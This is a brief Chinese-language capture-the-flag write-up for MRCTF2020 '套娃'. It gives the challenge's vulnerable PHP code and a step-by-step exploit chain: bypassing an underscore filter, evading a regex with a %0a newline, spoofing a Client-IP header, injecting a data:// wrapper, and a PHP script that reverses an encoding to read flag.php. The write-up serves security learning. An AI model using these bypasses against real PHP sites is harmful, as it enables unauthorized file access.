[MRCTF2020]套娃 (buu)
代码:
<?php $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){ echo "you are going to the next ~"; } ?>
第一个if对下划线和url编码之后的下划线进行了过滤
绕过方法:
1、%20
2、 .
b_u_p_t内容需要等于23333,但是preg_match匹配了23333。这个时候需要加上%0a(换行符)绕过preg_match中的$。
提示 secrettw.php,进去之后查看代码发现了一串jsfuck编码
随便post传入一个Merak参数,然后显示了代码:
<?php error_reporting(0); include 'takeip.php'; ini_set('open_basedir','.'); include 'flag.php'; if(isset($_POST['Merak'])){ highlight_file(__FILE__); die(); } function change($v){ $v = base64_decode($v); $re = ''; for($i=0;$i<strlen($v);$i++){ $re .= chr ( ord ($v[$i]) + $i*2 ); } return $re; } echo 'Local access only!'."<br/>"; $ip = getIp(); if($ip!='127.0.0.1') echo "Sorry,you don't have permission! Your ip is :".$ip; if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){ echo "Your REQUEST is:".change($_GET['file']); echo file_get_contents(change($_GET['file'])); } ?>
需要满足ip地址为127.0.0.1,并且用file_get_contents打开get传入的2333参数,
ip地址可以用Client-IP伪造,然后通过伪协议data读文件,不知道伪协议php://input有没有效
?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=&file=flag.php
得到了一串字符 ~X��" ,这个时候需要将解密一下change函数,将参数传入change函数之后的内容为flag.php
payload:
<?php function rechange($v){ $re = ''; for($i=0;$i<strlen($v);$i++){ $re .= chr (ord($v[$i])-$i*2); } return $re; } echo base64_encode(rechange('flag.php')); ?>
.